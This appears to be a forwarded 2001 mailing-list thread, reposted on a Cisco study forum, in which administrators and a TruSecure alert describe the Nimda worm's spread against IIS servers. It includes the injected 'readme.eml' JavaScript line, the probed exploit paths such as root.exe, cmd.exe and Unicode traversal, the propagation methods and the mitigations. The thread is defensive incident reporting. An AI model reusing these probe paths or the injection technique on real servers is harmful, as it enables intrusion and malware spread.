More information below.
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Mark Radabaugh - Amplex
Sent: Tuesday, September 18, 2001 9:49 AM
To: [EMAIL PROTECTED]
Subject: RE: Worm probes
This is new - it modifies the web pages of the infected machine to
include a (I assume) virus. It adds this string to the web page:
window.open("readme.eml", null,
"resizable=no,top=6000,left=6000")
Viewing infected web servers may be dangerous.
Mark Radabaugh
Amplex
(419) 833-3635
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
ravi pina
Sent: Tuesday, September 18, 2001 9:35 AM
To: [EMAIL PROTECTED]
Cc: [EMAIL PROTECTED]
Subject: Re: Worm probes
indeed. scanning for strings that appear to be associated
with the Concept Virus(CV) V.5, there is a tremendous
increase in bandwidth usage. today alone i match:
/scripts: 18013
/_vti_bin: 1885
_mem_bin: 1916
/ms_adc/: 1945
/winnt/system32: 27648
bugtraq is starting to get in the preliminary reports
of this worm. beware that infected host's home pages
contain a javascript that sends you to a page that
attempts to send you a copy of the worm. fantastic, eh?
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Braun, Mike
Sent: Tuesday, September 18, 2001 9:34 AM
To: '[EMAIL PROTECTED]'
Subject: FW: Worm probes
I received this warning from TruSecure regarding the latest worm attack.
Mike Braun
First American CREDCO
-----Original Message-----
TruSecure ALERT- TSA 01-023 - W32.nimda.a.mm
Date: September 18, 2001
Time: 1000 EDT
RISK INDICES:
Initial Assessment: RED HOT
Threat: VERY HIGH, (rapidly increasing)
Vulnerability Prevalence: VERY HIGH, effects IIS servers version 4.0,
5.0, and internal networks.
Cost: High, command execution is possible
Vulnerable Systems: IIS 4.0 and 5.0
SUMMARY:
A new IIS worm is spreading rapidly. Its working name is Nimda:
W32.nimda.a.mm
It started about 9am eastern time today, Tuesday,September 18, 2001,
Mulitple sensors world-wide run by TruSecure corporation are getting
multiple hundred hits per hour. And began at 9:08am am.
The worm seems to be targeting IIS 4 and 5 boxes and tests boxes for
multiple vulnerabilities including:
Almost all are get scripts, and a get msadc (cmd.exe)
get_mem_bin
vti_bin owssvr.dll
Root.exe
CMD.EXE
../ (Unicode)
Getadmin.dll
Default.IDA
/Msoffice/ cltreq.asp
This is not code red or a code red variant.
The worm, like code red attempts to infect its local sub net first,
then spreads beyond the local address space.
It is spreading very rapidly.
TruSecure believes that this worm will infect any IIS 4 and IIS 5
box with well known vulnerabilities. We believe that there are
nearly 1Million such machines currently exposed to the Internet.
Risks Indices:
Vulnerability VULNERABILITY PREVALANCE is very high - Milllions of
Internet Web server hosts: TruSecure process and essential
configurations should generally be protective. The vulnerability
prevalence world-wide is very high
Threat - VERY HIGH and Growing The rate of growth and spread is
exceedingly rapid - significantly faster than any worm to date and
significantly faster than any variant of Code red.
Cost -- Unknown, probably moderate per infected system.
The worm itself is a file called
README.EXE, or ADMIN.DLL
a 56K file which is advertised as an audio xwave mime type file.
Other RISKS:
There is risk of DOS of network segments by traffic volume alone
There is large risk of successful attack to both Internet exposed IIS
boxes and to developer and Intranet boxes inside of corporations.
Judging by the Code Red II experience, we expect many subtle routes
of infection leading to inside corporate infections.
We cannot discount the coincidence of the date and time of release,
exactly one week to (probably to the minute) as the World Trade
Center attack .
REPLICATION:
There are at least three mechanisms of spread:
The worm seems to spread both by a direct IIS across Internet (IP
spread)
It probably also spreads by local shares. (this is not known for
sure at this time)
There is also an email vector where README.EXE is sent via email to
numerous accounts.
Mitigations
TruSecure essential practices should work.
Block all email with EXE attachments
Filter for README.EXE
Make sure IIS boxes are well patched and hardened, or removed from
both the Internet and Intranets.
Make sure any developer computing platforms are not running IIS of
any version (many do so by default if either.
Disconnect mail from the Internet
Advise users not to double click on any unexpected attachments.
Update anti-virus when your vendor has the signature.
-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Eric Gauthier
Sent: Tuesday, September 18, 2001 9:55 AM
To: [EMAIL PROTECTED]
Subject: Re: Worm probes
> Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
> I've nailed a copy, and am working on getting it to the right security
> people. A *PRELIMINARY* (eyeballing the output of 'strings' indicates
that
> this one *both* sends itself via-email a la SirCam, *AND* scans for
vulnerable
> web servers, and if it finds a vulnerable server, it causes anybody
visiting
> that webpage to be offered a contaminated .exe as well.
> I do *NOT* have a handle on what malicious effects it has other than just
> propagating.
I work at a large university and our security guys think this guy is what's
been causing us problems all morning. Lots of subnet scans (tons of
incomplete arps), CC Mail servers are wacking out, HPOV noting that
old 3Com gear is dropping etc. This is what I've heard through the rumor
mill (so take it with a grain of salt)...
"...At first blush, it spreads itself via by web, email, and maybe shares.
We've seen it spreading by a set of two HTTP requests. It will look for
backdoors left behind by Code Red, such as /scripts/root.exe. It uses tftp
to copy itself to the target machine then launches it via a second HTTP
command."
Eric :)
-----Original Message-----
From: Bryan Heitman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:22 AM
To: [EMAIL PROTECTED]
Subject: Re: Worm probes
We're also seeing a large increase in this activity. This seems to be more
severe than the first time. Have an additional 30 to 40 meg inbound from
this.
Best regards,
Bryan Heitman
CommuniTech.Net, Inc.
----- Original Message -----
From:
To:
Sent: Tuesday, September 18, 2001 10:05 AM
Subject: Re: Worm probes
> ugh...this is way more impact...a 128k ISDN customer running an NT/Win2k
> box is at 100% BW, and my 2x T1's are at about 2x normal traffic for this
> time of day, although still well short of capacity...apache server
> processor load is WAY up just from the requests, and the logs are growing
> like mad.
>
> On Tue, 18 Sep 2001, deeann mikula wrote:
>
> >
> > On Tue, 18 Sep 2001, ravi pina wrote:
> >
> > >
> > > On Tue, Sep 18, 2001 at 09:54:31AM -0400, [EMAIL PROTECTED] said at one
point in time:
> > > >
> > > >
> > > > Has anyone else been seeing a dramatic increase in /scripts/.. NT
worm
> > > > probes this morning? We're seeing about 8000/second, starting
around 9:15
> > > > Eastern time, to and from a wide variety of addresses.
> > >
> > > affirmative. i just looked at my logs, and it looks like
> > > each probe tries a bunch of things. i haven't seen much
> > > on the lists, but i'm looking right now.
> >
> > i'm pretty sure that the worm's attack phase starts on the 20th (which
> > of course, depends upon a correctly set system clock) and also that
> > attempting to execute something like /scripts/root.ext/c++ something
> > is involved.
> >
> > i think that cert's website would be a good place to look. i'm *not*
> > a security/virus chick, but i did host a talk by marty linder of cert
> > where he discected code red's activity and presented a summary.
> >
> > cert is of course, http://www.cert.org.
> >
> >
> > deeann m.m. mikula
> >
> > director of operations
> > telerama public access internet
> > http://www.telerama.com
> > 1.877.688.3200
> >
> >
> >
> >
>
> James Smallacombe PlantageNet, Inc. CEO and Janitor
> [EMAIL PROTECTED] http://3.am
> =========================================================================
Message Posted at:
http://www.groupstudy.com/form/read.php?f=7&i=20294&t=20294
--------------------------------------------------
FAQ, list archives, and subscription info: http://www.groupstudy.com/list/cisco.html
Report misconduct and Nondisclosure violations to [EMAIL PROTECTED]
